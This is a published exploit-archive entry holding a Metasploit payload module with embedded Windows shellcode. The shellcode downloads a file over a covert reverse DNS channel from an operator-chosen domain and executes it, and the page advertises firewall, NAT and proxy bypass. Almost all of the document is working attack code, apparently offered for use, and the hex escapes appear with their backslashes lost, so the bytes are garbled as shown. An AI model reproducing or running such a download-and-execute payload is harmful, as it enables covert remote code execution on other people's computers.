DNS Reverse Download and Exec Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DNS Reverse Download and Exec Shellcode
# Published : 2011-05-26
# Author :
# Previous Title : Write-to-file Shellcode (Win32)
# Next Title : Linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes
##
# Shellcode: download and execute file via reverse DNS channel
#
# 
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with  Vista/7/2008 
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)

require 'msf/core'

module Metasploit3

	include Msf::Payload::Windows
	include Msf::Payload::Single

	def initialize(info = {})
		super(update_info(info,
			'Name'          => 'DNS_DOWNLOAD_EXEC',
			'Version'       => '0.01',
			'Description'   => 'Download and Exec (via DNS)',
			'Author'        => [ 'Alexey Sintsov' ],
			'License'       => MSF_LICENSE,
			'Platform'      => 'win',
			'Arch'          => ARCH_X86,
			'Payload'       =>
				{
					'Offsets' =>{ },
					
					'Begin' => "xebx02xebx7Axe8xf9xffxffxffx47x65x74x50x72x6Fx63x41x64x64x72x65x73x73xFFx47x65x74x54x65x6dx70x50x61x74x68x41xFFxFFxFFxFFxFFxFFxFFxFFx57x69x6Ex45x78x65x63xFFx45x78x69x74x54x68x72x65x61x64xffx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41xFFx77x73x32x5fx33x32xFFx57x53x41x53x74x61x72x74x75x70xFFx67x65x74x61x64x64x72x69x6ex66x6fxFFx6dx73x76x63x72x74xFFx66x6fx70x65x6exFFx66x77x72x69x74x65xFFxEBx13x66x63x6cx6fx73x65xFF",
					
					'Payload1' =>			"xFFx5ex33xc9xb1xe4x8bxd1x2bxe2x8bxfcxf3xa4x33xc0x8bxfcx8Ax04x39x3AxCAx74x0Dx3CxFFx74x03x41xEBxF2x88x2Cx39x41xEBxECxebx78x31xC9x64x8Bx71x30x8Bx76x0Cx8Bx76x1Cx8Bx5ex08x8Bx7Ex20x33xedx83xc5x18x8Bx36x66x39x0Cx2Fx75xedx8Bx73x3Cx8Bx74x1Ex78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex14x33xEDx56x57x51x8Bx3Fx03xFBx8BxF2x6Ax0Ex59xF3xA6x74x08x59x5Fx83xC7x04x45xE2xE9x59x5Fx5Ex8BxCDx8Bx46x24x03xC3xD1xE1x03xC1x33xC9x66x8Bx08x8Bx46x1Cx03xC3xC1xE1x02x03xC8x8Bx01x03xC3x8BxFAx8BxF7x83xC6x0Ex8BxD0x6Ax04x59xC3x8bxd4xe8x81xffxffxffx50x33xc0xb0x0fx03xf8x57x53xffxd2x50x33xc0xb0x14x03xf8x57x53xffx54x24x0cx50x33xc0xb0x08x03xf8x57x53xffx54x24x10x50x33xc0xb0x0bx03xf8x57x53xffx54x24x14x50x8bxc7x83xc0x0dx50xffx54x24x04x8bxd8x33xc0xb0x14x03xf8x57x53xffx54x24x18x50x33xc0xb0x0bx03xf8x57x53xffx54x24x1Cx50x83xc7x0cx57xffx54x24x0cx8bxd8x83xc7x07x57x53xffx54x24x20x50x83xc7x06x57x53xffx54x24x24x50x50x8bxf4x83xc7x09x57x53xffx54x24x2cx50x33xc0xb4x03x2bxe0x8bxccx51x50xffx56x20x03xe0x59x59x8bxc8xb8",
					
					'Payload2' =>	"xbax01x01x01x01x2bxc2x50xb8x79x78x6fx2ex50x2bxe1x8bxccx33xc0xb0x77xb4x62x50x54x51xffx56x08x33xd2xb6x03xb2x0cx03xe2x50x33xc0xb4x05x2bxe0x54x33xc0xb0x02xb4x02x50xffx56x10x32xc9x50x80xf9x80x74x04xfexc1xebxf6x83xc4x10xb0x06x50xb0x01x50xb0x17x50x83xecx04x8BxECx83xC7x07x83xECx20x33xC0x8Ax0Cx38x88x0Cx04x40x84xC9x75xF5x33xc0xb9x61x61x61x61x8bxd9x51x8bxd4x83xc2x7fx52x33xd2x55x52x8bxd4x83xc2x0cx52xffx56x0cx59x51x85xc0x75xe7x33xDBxB3xeex2BxE3x50x8bxc5x8bx40x5bx8bx48x18x8bx50x1cx83xC1x08x33xC0x33xFFx66x8Bx01x66x3dxffxffx74x7fx8bxf8xc1xefx08x32xe4x5bx03xfbx57x66x8Bx59x02x66x89x5cx04x04x8Bx79x04x89x7Cx04x06x8Bx79x08x89x7Cx04x0Ax8Bx79x0Cx89x7Cx04x0Ex8bxc2x85xc0x75xbbx58xffx76xf8x50xb0x01x50x8bxc4x83xc0x0cx50xffx56x04x33xc0xb0xeex03xe0x58x58x58x58x58x2Dx61x61x61x61xC0xE4x04x02xC4x3CxFFx75x13x8AxE0x40xc1xe8x10x3cx1ax75x04xfexc4x32xc0xc1xe0x10xebx08x40x8axe0xC0xECx04x24x0Fx05x61x61x61x61x50xe9x46xffxffxffx8bx46xf8x50xffx56xfcx66xb8x22x05x03xe0"+"x68x2fx63x20x22x68x63x6dx64x20x8bxccx41x8ax01x84xc0x75xf9xc6x01x22x88x41x01"+"x33xc0x8bxccx50x51xffx56x1cx50xffx56x18"  
					
				}
			))

		# We use rtlExitThread(0)
		deregister_options('EXITFUNC')

		# Register the domain and cmd options
		register_options(
			[
				OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
				OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
			], self.class)
	end

	#
	# Constructs the payload
	#
	def generate_stage
		domain  = datastore['DOMAIN'] || ''
		extens  = datastore['FILE'] || 'vbs'
		
		# "x66x79x66x01"
		extLen=extens.length
		
		while extens.length<4
			extens=extens+"x01"
		end
		
		i=0
		while i<extLen
			extens[i,1]=(extens[i].ord+1).chr
			i=i+1
		end
		
		while domain.length<10
			domain=domain+"xFF"
		end
		
		domain="x2e"+domain
		
		payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
				
		return payload
	end

end